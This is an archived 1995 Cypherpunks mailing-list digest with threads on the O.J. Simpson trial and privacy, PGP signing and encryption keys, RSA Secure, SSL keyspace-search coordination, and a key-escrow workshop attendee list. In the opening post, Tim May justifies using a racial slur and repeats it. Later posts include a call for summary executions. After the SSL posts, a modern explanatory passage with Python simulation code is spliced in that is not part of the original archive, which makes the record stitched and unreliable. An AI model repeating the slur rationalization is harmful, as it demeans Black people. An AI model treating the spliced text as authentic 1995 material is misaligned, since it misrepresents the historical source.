What really bothers me, as it relates to the pro-privacy themes of this list, is the reaching back many years to comments made by a witness--Mark Fuhrman--to a screenplay writer. Because she kept audiotapes, going back 10 years, these comments may likely strongly influence the verdict in this "trial of the century."

Anyone in favor of heading off the "surveillance society" should be alarmed at this development. As tape recorders and video cameras proliferate, comments may be compiled, taken out of context, and used as evidence.

(Who amongst us has not said "nigger"? Does it count if I am asking why the rap group "Niggas with Attitude" chooses to label themselves as niggers?
I figure that if blacks routinely call themselves niggers and call folks like me "honkies," then it's fair to call _them_ niggers. Not that I do this, but I don't see the term as so horrifying as to cause a killer like OJ to get off as this spectacle unfolds. Besides, it's become "permissible" for black leaders to refer to New York City as "Hymietown" in a way that would result in public stoning for a white to refer to a city as "Niggertown." The old double standard.)

The point: Fuhrman should have used a pseudonym, should have taken steps to protect his identity. Of course, in 1985 this would have been harder.

But have people given up the right to speak "for themselves" in private? If there is no solid evidence that Fuhrman actually committed any crimes, but only appeared to be puffing himself up, a la a Wambaugh wannabee, then why are his "racist" and "sexist" comments deemed so important as to have derailed the trial for the last couple of weeks?

I have said an awful lot of inflammatory things at Cypherpunks meetings, at parties, in political discussions, and so forth. I don't claim that there should be a law against people bringing these issues up, or even a law against tape-recording various kinds of meetings. I just argue that we are devolving into a surveillanc

To be sure, there are valid trial issues:

-- Did he misspeak, misremember, or lie when he said he had "never" used the word "nigger" in the past 10 years? (I recall at the time, circa Feb-March, thinking to myself "Oh, sure!," when he said he had not used the word nigger in the past 10 years.)

-- If this is perjury, how does it affect other evidence? (I'm not a lawyer, but I grok from the comments on CNN that this has to do with whether his testimony was supportive of other evidence, "cumulative," and related issues.)

-- Does this possible misspeaking, misremembering, or lying have anything to do with whether he planted the bloody glove?

-- etc.

There are various valid issues.
Spending a few weeks on these issues is another matter, though, IMHO. In my view, if I were the judge I'd have forced this issue to be resolved in hours, not weeks.

Anyway, I am greatly disturbed by this "mining" of ancient comments, made to a screenwriter. Whether Fuhrman is a "racist" or not, this witch trial is a diversion from the real issues. And some real privacy issues are raised.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From mr.xxx at ce.flashnet.it Fri Sep 1 12:00:27 1995
From: mr.xxx at ce.flashnet.it (Pasquale Piombino)
Date: Fri, 1 Sep 95 12:00:27 PDT
Subject: No Subject
Message-ID: <199509011900.VAA01399@ns.ce.flashnet.it>

Hi all,

I am searching PGP software. Does anyone know where I can download it?

Thanks for answers.

-+-+------------------->->--------------------------------:-Q------------
| Pasquale Piombino                                                     |
| Via Colombo, 35          Email: mr.xxx at ce.flashnet.it                 |
| I-81100 CASERTA          Phone - Fax: 0039 823 329152                 |
| ITALY                                                                 |
+-+-------------8-)---------------------:-))-----------------:-o---------

From stewarts at ix.netcom.com Fri Sep 1 12:15:26 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 1 Sep 95 12:15:26 PDT
Subject: Some details on RSA Secure
Message-ID: <199509011912.MAA29501@ix8.ix.netcom.com>

At 08:48 AM 8/31/95 PST, "baldwin" wrote:
>Here are my biased comments on RSA Secure. They are biased by
>the fact that I an a techie who works for RSA Data Security.

>Neatest Features:
>- It is integrated with the File Manager on Windows and the
> Finder on Mac System 7.
It's an interesting approach - simpler than installing as a file system (I'm not using SecDrv because it needs a separate partition), but so far it seems relatively useable. On the other hand, since there are file types it refuses to encrypt, like DLLs, there are some things it can't protect (like DLLs with passwords embedded in them.) >- A settable list of files can be automatically decrypted (or > encrypted) on system startup (or shutdown). I've got mixed feelings about this - since my password has normally timed out by the time I shut down, it demands a password before shutting down, and if I had any large amount of data there, I assume it would take a while to reencrypt on my 386-box. (Laptops are generally slower than similar-age desktops, and you often want to shut them down quickly, even when they aren't shutting themselves down to save power.) I haven't tried powering it off during this process, but I assume that at best the files would be unencrypted and at worst there'd be one half-decrypted and sitting in limbo to be trashed the next time the system starts up? >Technical Features: >- The user's passphrase unlocks a master key that is used to unlock > the file encryption key for each file. Since the documentation mentions 512-bit and 1024-bit RSA keys, I'd guess that each file has a separate random RC4 key which is stored in the file header, encrypted with the user and escrow RSA keys plus the MD5 hash, plus the encrypted real filename? (The alternative would be that the userpref.!!! file contains an RC4 key encrypted with RSA, which is used to encrypt the file keys, but that would lead to much shorter headers, and cracking that master RC4 key would then allow cracking of all documents on the system, so I'm guessing that's not the approach used.) >Request for Improvements: 1) The "Emergency" menu item in the File Manager is annoying. Could it be combined with the RSA menu item, eliminated, or at least have the option of abbreviating the name? 
2) Can keys and files be shared between multiple machines, i.e. the same user keys on a desktop and laptop, so that individual encrypted files can easily be moved back and forth? #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Fri Sep 1 12:15:40 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 1 Sep 95 12:15:40 PDT Subject: O.J. ObCrypto: Fuhrman's Folly Fans Fakery Fears... Message-ID: <199509011912.MAA29475@ix8.ix.netcom.com> >I do not think that PGP 2.x can easily (ie: Automatically) use one key for >Signing and another for Encrypting a Message (it does both at the same time >if you ask). If I "Clear Sign" a message and then Encrypt it, then I get >the result but I'm not sure if doing the decrypt on such a message will >automatically spot the signature and verify it (as would occur with a E+S >pass). PGP identifies the key for decryption and signature checking from the message. When you're signing a message or key, you can pick which of your keys to use with the -u option. The difficulty is getting people to use your encryption key instead of your signature key when encrypting stuff for you. Derek mentioned one approach (get people to load the encryption key first); unfortunately, you can't predict their behavior, and if you change encryption keys more often than signature keys, they'll load the newest encryption key last. Another approach is to identify them in the names - my key certification key says "KeyCert-only" in the text. For the problem that started this discussion, though, there's no good solution. Since the Bad Guys _can_ encrypt a message to you with your signature key, and send it to you by anonymous remailer, they can plant a reason to suspect that you may have evidence encrypted with that key. 
#--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From rkw at dataplex.net Fri Sep 1 12:47:20 1995 From: rkw at dataplex.net (Richard Wackerbarth) Date: Fri, 1 Sep 95 12:47:20 PDT Subject: SSL search attack Message-ID: I wrote >>> Assuming that you are multi-threaded--- Simply run two "workers" on the >>> same machine. If there are delays in getting keys assigned, the two will >>> soon get out of phase and keep the cpu busy. >> I kind of like that idea... > To which Piete Brooks replied: >I thought of that, but: >1) for the same server load, it doubles the number of unACKed segments >2) if process A is lagging process B, then when process B finishes and is idle > waiting for the server, process A will run faster and thus reduce the lag. > This will make the processes drift into phase. > I'm not convinced one way or the other. But you forgot that when process A finishes, process B will run faster and re-establish its lead. The real question is what is the parameter that we need to minimize? Assuming that the key is distributed in the keyspace with a uniform probability, then what we need to minimize is the expectation that two or more workers are searching the same keyspace. As long as we never reach the point that all of the keys have been distributed, it does not matter how many or in what method they are assigned. (The "fairness" WRT a prize being ignored) The assignments only become important as we exhaust the space and must prepare to make another pass. Note that we never got to that point on challenge 2. The assignment of the block containing the key was processed on its first pass and the key was found. In this regard, it is probably "best" to first attempt to identify those space assignments that have been lost. 
If we associate with each key, either explicitly, or by inference, an expected completion time, those segments which are most overdue are certainly good candidates for having been lost.

Based on our previous try, and the assumption that we would not have extremely different resources available, the master allocator would not NEED to get reports back for the first say 12 hours. That is not to imply that reports should be delayed that long, but only that there is considerable opportunity to have a hierarchy of intermediate collectors that have plenty of time to adjust their allocation algorithms to match the ability of their workers.

Later, more rapid response would be needed. When the required response becomes too small for the "little guys", they could be sloughed off on the next problem, leaving the "big boys" to clean up the last pieces. Of course, the "next" problem might be to resolve the same problem because the correct answer was incorrectly reported as not found.

As I see it, except for perhaps the fastest of machines there is little reason to allocate to the workers more than one segment at a time. Their supervisor can quickly respond to requests for work and consolidate the results to be passed up the chain.

The only reason that I can see to separate the acks from the assignments is to be able to have "memory-less" nodes. This is certainly unnecessary if there is a web of supervisor servers.

I have a lot more thoughts that I will defer to the next missive. Gotta' run...
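The allocation scheme sketched in the two posts above (hand out one segment per worker, attach an expected completion time to each assignment, and once the fresh segments run out re-issue the most overdue ones as probably lost) can be made concrete. The following is an added illustration written for this archive, not code from Richard Wackerbarth, Piete Brooks or the actual challenge servers; the segment count, the fixed per-segment duration and the "worker that silently disappears" scenario are constructed for the simulation.

```python
import collections
from dataclasses import dataclass
from typing import Optional


@dataclass
class Segment:
    """One slice of the keyspace and the bookkeeping the allocator keeps for it."""
    seg_id: int
    assigned_at: Optional[float] = None
    expected_done: Optional[float] = None   # inferred completion time for the current assignment
    attempts: int = 0                       # how many times this segment has been handed out
    done: bool = False


class SegmentAllocator:
    """Hands out segments one at a time (as the post argues is sufficient).

    Fresh, never-assigned segments go first.  When none remain, the segment
    that is most overdue relative to its expected completion time is treated
    as lost and re-issued, so the space is covered without waiting forever
    for a worker that will never report back.
    """

    def __init__(self, n_segments: int, expected_duration: float):
        self.segments = [Segment(i) for i in range(n_segments)]
        self.fresh = collections.deque(range(n_segments))
        self.expected_duration = expected_duration  # assumption: same estimate for every worker

    def overdue(self, now: float):
        """Assigned, unfinished segments past their expected completion, most overdue first."""
        late = [s for s in self.segments
                if not s.done and s.expected_done is not None and now > s.expected_done]
        return sorted(late, key=lambda s: now - s.expected_done, reverse=True)

    def assign(self, now: float) -> Optional[int]:
        """Return the next segment id to work on, or None if nothing needs doing right now."""
        if self.fresh:
            seg = self.segments[self.fresh.popleft()]
        else:
            late = self.overdue(now)
            if not late:
                return None  # everything is either finished or still within its expected time
            seg = late[0]
        seg.assigned_at = now
        seg.expected_done = now + self.expected_duration
        seg.attempts += 1
        return seg.seg_id

    def report(self, seg_id: int) -> None:
        """A worker (or intermediate collector) reports a segment as searched."""
        self.segments[seg_id].done = True

    def all_done(self) -> bool:
        return all(s.done for s in self.segments)


def simulate(n_segments: int = 6, n_workers: int = 3, duration: float = 10.0,
             lost_worker: int = 1, max_ticks: int = 100):
    """Constructed scenario: `lost_worker` takes a segment and never reports.

    Returns (lost segment id, tick at which it was re-issued, total assignments made).
    """
    alloc = SegmentAllocator(n_segments, duration)
    now = 0.0
    in_flight = {}          # worker -> (segment id, tick at which it will report)
    lost_seg = None
    reissued_at = None
    while not alloc.all_done() and now < max_ticks:
        for w, (seg, finish) in list(in_flight.items()):   # finished workers report in
            if finish <= now:
                alloc.report(seg)
                del in_flight[w]
        for w in range(n_workers):                           # idle workers ask for work
            if w in in_flight:
                continue
            seg = alloc.assign(now)
            if seg is None:
                continue
            if w == lost_worker and lost_seg is None:
                lost_seg = seg
                in_flight[w] = (seg, float("inf"))           # this worker never reports
            else:
                if seg == lost_seg and reissued_at is None:
                    reissued_at = now
                in_flight[w] = (seg, now + duration)
        now += 1.0
    return lost_seg, reissued_at, sum(s.attempts for s in alloc.segments)
```

In the constructed run, segment 1 is handed to the vanishing worker at tick 0; the allocator keeps issuing fresh segments until tick 20, at which point the only unfinished segment is the one that is ten ticks overdue, so it is re-issued and the space completes at tick 30 with seven assignments for six segments. Choosing the expected duration per worker (rather than one global value) is the refinement the post describes for intermediate collectors.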
---- Richard Wackerbarth rkw at dataplex.net From pfarrell at netcom.com Fri Sep 1 13:28:27 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Fri, 1 Sep 95 13:28:27 PDT Subject: Key Escrow Workshop agenda & discussion paper 3 Message-ID: <59234.pfarrell@netcom.com> The following message segment: ------------------------------ From: Arlene Carlton Fri, 01 Sep 1995 15:30:46 -0400 Cc: carlton at micf.nist.gov Subject: Key Escrow Workshop agenda & discussion paper 3 September 1, 1995 Dear Participant: Thank you for agreeing to participate in the two-day meeting on software key escrow encryption. We are anxious to work with you and other industry representatives to facilitate development of exportable key escrow encryption in software products. I look forward to the workshop being an important step in that process. [snip] --------------------------------- Was sent to the following folks. I assume that this means that these people are participants. I see Dan W from CDT, Soble from EPIC and Whitfield Diffie, on our side, plus assorted folks with stakes such as tis.com and netscape.com And of course, DERD for the other side. Blank Unicorn had posted to c'punks that he was attending. Of course, while I know what he looks like, I have no idea which nym is his. 
Pat List of attendees/registered participants follows: 100436.3361 at compuserve.com, 73167.2027 at compuserve.com, 73534.3011 at compuserve.com, 75300.3232 at compuserve.com, 76225.2603 at compuserve.com, ablee at mitre.org, ads012 at email.corp.mot.com, ams at eit.com, amte09 at email.corp.mot.com, asteen at novell.com, baum at world.std.com, bekutz at aol.com, bflowe at mcimail.com, bill.poulos at oga.eds.com, bill.poulos at oga.eds.com, branstad at tis.com, bsaclu at aol.com, c.baggett at cablelabs.com, carol.donovan at network.com, ccrafton at gi.com, charlesabzug at acm.org, ckc at rfpo1.rfc.comm.harris.com, cmo at cohnmarks.com, coallen at us.oracle.com, cpadilla at attmail.com, cpadilla at attmail.com, csmith at steptoe.com, davery at grci.com, david_rose at ccm.fm.intel.com, ddodson at nist.gov, denning at cs.cosc.georgetown.edu, deyoung at rpcp.mit.edu, dinsmore at tis.com, djw at cdt.org, dkozlay at ire.com, dmiller at spa.org, Don_Sortor-ads012 at email.corp.mot.com, ebarker at nist.gov, ed at tecsec.com, emessmer at world.std.com, ezzy_dabbish-amte09 at email.corp.mot.com, flahavin at csmes.ncsl.nist.gov french at zeke.enet.dec.com, gomes at dockmaster.ncsc.mil, gordon at ipower.nsc.com, hoffman at seas.gwu.edu, housley at spyrus.com, hoydyshd at mcln.unisysgsg.com, i.goldsmith at nexor.co.uk, infocker at megaweb.com, jackk at microsoft.com, jag at jgvandyke.com, jaltman at milchev.com, jamanni at missi.ncsc.mil, james.hughes at network.com, jdrandall at vnet.ibm.com, jean_m_baronas at co.xerox.com, jeff.rulifson at Eng.Sun.COM, jeff at netscape.com, jerry at ods.com, jgheiner at aol.com, jimmy at ipower.nsc.com, jimn at calv1.cray.com, jkrauss at cpcug.org, john at ipower.nsc.com, john_pascatore at ivision.com, jroberts at cmp.com, js at cup.hp.com, jseiger at cdt.org, jwinston at ota.gov, jya at pipeline.com, jya at pipeline.com, kandy at micf.nist.gov, karen.randall at att.com, kawamoto at mitre.org, kaye at ix.netcom.com, kent_landfield at 
sterling.com, khrose at annap.infi.net, klensin at mci.net, lc2m at andrew.cmu.edu, lcarnahan at nist.gov, lhg at nrc.gov, lovornj at usva8.dyncorp.com, lshomo at hqops.hq.nasa.gov, lthrash at hqamc.army.mil, lydia.bell at tip.navsea.navy.mil, maitgmu at aol.com, martin.ferris at treas.sprint.com, mary_smolenski at ita.doc.gov, mbohannon at banyan.doc.gov, mccord at nosc.mil, melanie.carter-maguire at nt.com, mendelson at tis.com, mfa at compaq.com, michael.palgon at sciatl.com, mignon at atc.boeing.com, mikus at viacrypt.com, mjl at liii.com, mpapillo at snap.org, mpapillo at snap.org, mppulkk at mikropc.fi, mrainey at itic.nw.dc.us, murray2 at vnet.ibm.com, natstrat at dgs.dgsys.com, nazario at csmes.ncsl.nist.gov, paradise at wellsfargo.com, pfarrell at netcom.com, pjclark at ix.netcom.com, po7114 at email.mot.com, polk at csmes.ncsl.nist.gov, powar at visa.com, randy at mci.net, ravenis at novell.wd.cubic.com, rjg9324 at glaxo.com, rjoconnor at aol.com, rmedlock at mitre.org, roberth at bsa.org, rolfe.doc.gov at micf.nist.gov, rozzie at iris.com, rwessman at us.oracle.com, sbaker at steptoe.com, Schneck at mitre.org, Schneck at ncsl.nist.gov, sevans at csn.com, shabbir at panix.com, simona at sea.org, sking at mitre.org, sltm at msg.ti.com, snouffer at st1.ncsl.nist.gov, sobel at epic.org, squires at arpa.mil, stuart at bellcore.com, stw at atc.boeing.com, sullivan at interramp.com, tajalli at tis.com, tec.teclgl at micf.nist.gov, ted_gerbracht at ml.com, tfuhrman at ostp.eop.gov, thomas_clare at sterling.com, trivers at is.ge.com, trstsc at tevm2.nsc.com, ttobin at atl.ge.com, wafranklin at attmail.com, walker at tis.com, walt at osf.org, walters at snad.ncsl.nist.gov, wford at bnr.ca, whitehurst at vnet.ibm.com, whitfield.diffie at Eng.Sun.COM, whpayne at abq-ros.com, wmcglone at milchev.com, wright at dockmaster.ncsc.mil, Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. 
Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From jeffb at sware.com Fri Sep 1 14:01:12 1995 From: jeffb at sware.com (Jeff Barber) Date: Fri, 1 Sep 95 14:01:12 PDT Subject: Fuhrman needed a digital pseudonym! In-Reply-To: Message-ID: <9509012100.AA07333@wombat.sware.com> Timothy C. May writes: I almost always agree with Tim. This time I have to differ -- I think his outrage at the course of the OJ trial has fogged his head. > * This post is primarily about the role of pseudonyms, not the OJ trial or > the testimony/tapes involving Mark Fuhrman. Well, it's hard to see that from reading the rest of it. > Before you folks jump on the "racist" Mark Fuhrman, think about the > "surveillance state" issues. While it was not any government organization > that taped Fuhrman's comments, there are some real issues involved in how > deeply and how far back we want to "mine" comments made by people. Some > real issues of privacy. I don't see any "surveillance state" issue. Fuhrman openly agreed to speak to the screenwriter. AFAIK, he had no reason to believe the screenwriter wouldn't tell anyone else. Nor should he have counted on that anyway. Any loss of credibility (or other penalty) he receives is entirely deserved, IMO. If he didn't want his words coming back to "haunt" him, he shouldn't have spoken them, in this setting at least, whether they were sincere or merely an attempt to puff himself up in her eyes. Speaking as a "consultant" (or whatever he imagined his relationship with the screenwriter to be) isn't the same as speaking in confidence to your best friend in a private setting anyway. > Anyone in favor of heading off the "surveillance society" should be alarmed > at this development. As tape recorders and video cameras proliferate, > comments may be compiled, taken out of context, and used as evidence. I am not alarmed in the least (by this development, anyway). 
There's no evidence that Fuhrman's comments are being taken out of context. Fuhrman freely entered into the arrangement wherein his comments were recorded. Let's face it, the most likely explanation here is that Fuhrman is a lying scumbag. The fact that Fuhrman may be a lying scumbag doesn't make OJ any less guilty. However, it does throw a lot of suspicion on Fuhrman's testimony. OJ's entire defense has been based on the claim that Fuhrman and other LAPD members lied and otherwise conspired in order to frame him. These tapes are clearly appropriate to that defense whether you believe the defense a valid one or not. > But have people given up the right to speak "for themselves" in private? If > there is no solid evidence that Fuhrman actually committed any crimes, but > only appeared to be puffing himself up, a la a Wambaugh wannabee, then why > are his "racist" and "sexist" comments deemed so important as to have > derailed the trial for the last couple of weeks? The fact that Fuhrman's comments are racist or sexist are not the point. What is important is that he lied in court about having made those statements. If he or the prosecution believes that a case can be made that Fuhrman was just puffing himself up, then they should try to convince the jury of that. > To be sure, there are valid trial issues: > > -- Did he misspeak, misremember, or lie when he said he had "never" used > the word "nigger" in the past 10 years? Yes, IMO, this is the important issue. Anyone who dispenses racial epithets with the ease he apparently displayed in the tapes is an idiot to have made such a claim whether the tapes were puffery or not. > -- If this is perjury, how does it affect other evidence? (I'm not a > lawyer, but I grok from the comments on CNN that this has to do with > whether his testimony was supportive of other evidence, "cumulative," and > related issues.) 
IANAL, but let me just say that if I were on the jury, I don't think I'd believe a single word he'd said during the trial. I think that I would probably still believe him to be guilty, anyway, but it's hard to be sure without having heard only what the jury has heard.

> -- Does this possible misspeaking, misremembering, or lying have anything
> to do with whether he planted the bloody glove?

I don't know. I'm kinda amazed that Ito has said that other portions of his taped words won't be used, such as those parts where he describes manufacturing evidence against the accused. That seems to me to be clearly relevant, at least as relevant as his use of the n-word.

> Anyway, I am greatly disturbed by this "mining" of ancient comments, made
> to a screenwriter.

Not me. A few weeks ago there was a thread concerning the use of information by private "reputation" bureaus. I can't find the thread in the archives but I seem to recall you defending the right of private entities to keep and distribute such information (my apologies if this was someone else). Anyway, to me, these tapes fall clearly in the same domain. This screenwriter isn't a government agency, the information was freely given, and the screenwriter has every right to offer it for whatever purpose she deems appropriate, for free or for money (barring any agreements to the contrary, of which I have heard nothing).

-- Jeff

From warlord at MIT.EDU Fri Sep 1 14:14:53 1995
From: warlord at MIT.EDU (Derek Atkins)
Date: Fri, 1 Sep 95 14:14:53 PDT
Subject: Different Keys for Signing and Encrypting
In-Reply-To: <199509011912.MAA29475@ix8.ix.netcom.com>
Message-ID: <9509012114.AA00959@m37-332-6.MIT.EDU>

> unfortunately, you can't predict their behavior, and if you change
> encryption keys more often than signature keys, they'll load the
> newest encryption key last.

Actually, the most recently-added key will be the one that is used..
So updating your encryption key works fine, since the most recent encryption key will be on top, and hence used first.

> For the problem that started this discussion, though, there's no good
> solution. Since the Bad Guys _can_ encrypt a message to you with your
> signature key, and send it to you by anonymous remailer, they can
> plant a reason to suspect that you may have evidence encrypted with
> that key.

True.. To get around this problem you need the concept of a two-key certificate... However a rogue user could still use the signature key to encrypt, so I'm not sure that even this would help the problem.

-derek

From tcmay at got.net Fri Sep 1 14:21:55 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 1 Sep 95 14:21:55 PDT
Subject: Fuhrman needed a digital pseudonym!
Message-ID:

At 9:00 PM 9/1/95, Jeff Barber wrote:

>I don't see any "surveillance state" issue. Fuhrman openly agreed to
>speak to the screenwriter. AFAIK, he had no reason to believe the
>screenwriter wouldn't tell anyone else. Nor should he have counted on
>that anyway. Any loss of credibility (or other penalty) he receives
>is entirely deserved, IMO.

By the way, McKinny did not volunteer the tapes, nor did she consent to having them taken from her and used by the Defense. Private property was taken by a court action (the North Carolina lower court ruled that the tapes were the property of McKinny and could not be taken, then an appeals court overruled this decision and ordered McKinny to produce the tapes).

(It is not clear how Cochrane and his team learned of the tapes. Speculation is that McKinny's agent or lawyer was doing some freelance shopping-around of the script. McKinny has denied that she was trying to sell the tapes. Regardless, they are her property and should only come in to a court case when directly and centrally involved. This is closely related to the Church of Scientology issue, and is being debated on another mailing list I'm on, the Cyberia list.)
This raises serious issues. She was a screenwriter, Fuhrman was helping her to generate a salable script. Neither was speaking for the LAPD. (Kind of like the disclaimers we see on the Net, which I suspect are becoming worthless.) >> Anyway, I am greatly disturbed by this "mining" of ancient comments, made >> to a screenwriter. > >Not me. A few weeks there was a thread concerning the use of >information by private "reputation" bureaus. I can't find the thread >in the archives but I seem to recall you defending the right of >private entities to keep and distribute such information (my apologies >if this was someone else). Anyway, to me, these tapes fall clearly in You're imputing to my comments about what will happen, and what cannot be stopped except by coercion, a conclusion which you think is at odds with my point here. Just because I think people (like me, you, Laura McKinny, etc.) have the "right" to compile records, make notes, make tapes of conversations, etc., does not mean I think that courts can order them given to the court. (This is an issue I have with "discovery" in general, where even peripheral witnesses can be compelled to turn over diaries, journals, letters, tapes, records, financial reports, etc.) >the same domain. This screenwriter isn't a government agency, the >information was freely given, and the screenwriter has every right to >offer it for whatever purpose she deems appropriate, for free or >for money (barring any agreements to the contrary, of which I have >heard nothing). Again, to make it clear, McKinney did not offer the material and fought in the North Carolina courts to have her property kept confidential. The court ordered her to turn it over. (And apparently members of the defense team leaked the most damaging, and out of context, parts, provoking Ito to announce a major investigation of this is to come, with severe sanctions for those who leaked it.) 
We need a justice system which will not be dragged into spending a full year on this matter, with every indication that a mistrial or hung jury will result. I look forward to a day in which an OJ would get a reasonable, month-long trial...and then, if found guilty, be given an execution date no longer than a month away. As it is, OJ will be guesting on the talk show circuit. He butchers two people--from the overwhelming mound of evidence I've seen--and essentially cuts the head off of his ex-wife, but will likely get off as this trial spins out of control and fragments in various ways. Don't misunderstand my motivations: I'm sort of happy this is all happening. It makes people even more suspicious of governments and lawyers, and it will accelerate the disintegration of the current system. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From terrell at sam.neosoft.com Fri Sep 1 15:09:28 1995 From: terrell at sam.neosoft.com (Buford Terrell) Date: Fri, 1 Sep 95 15:09:28 PDT Subject: Fuhrman needed a digital pseudonym! Message-ID: <199509012218.RAA23055@sam.neosoft.com> > >From: tcmay at got.net (Timothy C. May) >Subject: Fuhrman needed a digital pseudonym! >Before you folks jump on the "racist" Mark Fuhrman, think about the >"surveillance state" issues. While it was not any government organization >that taped Fuhrman's comments, there are some real issues involved in how >deeply and how far back we want to "mine" comments made by people. Some >real issues of privacy. 
>
>The Mark Fuhrmans of the future may be interested in using technologies to
>protect their privacy, to give them "plausible deniability" should their
>recorded words come back to haunt them.
> ...
>* And the issue of "mining" of ancient records, especially as technology
>makes the recording of sounds, the taping of sights, and the archiving of
>electronic messages so much easier.
> ...
>What really bothers me, as it relates to the pro-privacy themes of this
>list, is the reaching back many years to comments made by a witness--Mark
>Fuhrman--to a screenplay writer. Because she kept audiotapes, going back 10
>years, these comments may likely strongly influence the verdict in this
>"trial of the century."
>
>Anyone in favor of heading off the "surveillance society" should be alarmed
>at this development. As tape recorders and video cameras proliferate,
>comments may be compiled, taken out of context, and used as evidence.
...
>
>--Tim May
>

If you've ever watched Not_at_all_Funny Home Videos or any of the American Urinal school of tabloid television, you soon start feeling that the real threat to privacy is not the guvmint, but all of the yoyos with their little cam corders running around pointing them at people.

Security cameras in ATMs and at airline ticket counters do more to threaten your privacy than do FIBBIE wiretaps, and PGP won't protect you from them. (and usually neither will the courts).

Buford C. Terrell                  1303 San Jacinto Street
Professor of Law                   Houston, TX 77002
South Texas College of Law         voice (713)646-1857
terrell at sam.neosoft.com           fax (713)646-1766

From starrd at iia2.org Fri Sep 1 15:13:26 1995
From: starrd at iia2.org (starrd)
Date: Fri, 1 Sep 95 15:13:26 PDT
Subject: Web of Trust
In-Reply-To: <199509011201.GAA01376@wero>
Message-ID:

On Fri, 1 Sep 1995 don at cs.byu.edu wrote:

> I am requesting that all "active" cypherpunks/cyphergroupies please send me
> their key number, IF it's already on the keyservers.
> If it's recently put
> there, be sure to tell me or I will be annoyed. If it's not there at all,
> I'll be annoyed. Personally annoyed, not I-ran-some-scriptfile annoyed. If
> you searched any of the RC4 or SSL keyspace, for example, I'm interested.
> If you post messages occasionally, [conspiracypunks need not apply] I'm
> interested. If you generated a key because your neighbor taught you how,
> don't bother.

Hi,

Please feel free to add my key to your keychain and/or keyserver. I am a cyberpunk in the most original sense. From the early '80s the days of 8BBS & 414's, etc. I am also in the book "CyberPunks" [now in your book store] see who signed my key, and you'll have a clue who I am.

Enjoy the key!

||||||||||||email address: starrd at iia2.org or starrd at cinenet.net|||||||||||
| Creator of the original                    | Get paid to upload          |
| Patriot's Archives                       \ shareware to BBSes and        |
| ftp: iia.org /pub/users/patriot           \_____ the Internet!           |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\ Get file:           |
| For index of available files: descript.ion \ uploader.zip                |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk
LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP
7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR
tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK
Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD
cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf
9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig=
=0Tlq
-----END PGP PUBLIC KEY BLOCK-----

From syrinx at c2.org Fri Sep 1 15:27:13 1995
From: syrinx at c2.org (Syrinx Anonymous Remailer)
Date: Fri, 1 Sep 95 15:27:13 PDT
Subject: CIA & Espionage
Message-ID: <199509012222.PAA13146@infinity.c2.org>

'Tatu Ylonen' was reported to have written:

> I do find it rather shocking that the most powerful
country in the > world sets industrial espionage as the primary task of their > intelligence services. Well, I have a letter from a United States Senator which was received last year in response to my phone call in opposition to the Digital Telephone Act of 1994 (S. 2375). Here's the interesting part: "According to the director of the Federal Bureau of Investigations (FBI), Louis Freeh, the number one law enforcement, public safety, and national security issue facing us today is preserving the ability to conduct court approved wiretaps." In other words, retaining the ability to monitor citizen communications is their greatest concern. This should be more than shocking to anyone who cares about privacy. It appears as though the primary function of the FBI and the "intelligence services" are similarly directed. One significant distinction is that the FBI's stated mission is directed toward the "owners of the country" (to borrow a term from Perot). From mfroomki at umiami.ir.miami.edu Fri Sep 1 15:34:33 1995 From: mfroomki at umiami.ir.miami.edu (Michael Froomkin) Date: Fri, 1 Sep 95 15:34:33 PDT Subject: Phil Zimmermann/Amnesty International? In-Reply-To: <199509011410.KAA20234@libws1.ic.sunysb.edu> Message-ID: I think he would have to be charged first. Have I missed something? PS when does the statute of limitations run out? A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | mfroomki at umiami.ir.miami.edu U. Miami School of Law | P.O. Box 248087 | It's hot there. And humid. Coral Gables, FL 33124 USA | But I'm elsewhere.... See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki From davidm at iconz.co.nz Fri Sep 1 15:46:04 1995 From: davidm at iconz.co.nz (David Murray) Date: Fri, 1 Sep 95 15:46:04 PDT Subject: A problem with anonymity Message-ID: <199509012245.KAA27969@iconz.co.nz> -----BEGIN PGP SIGNED MESSAGE----- Tim May said in article : > At 11:32 PM 8/31/95, Scott Brickner wrote: .. 
> > he sells its assets to his own identity at a fraction of their worth,
> > and defaults on the liabilities.
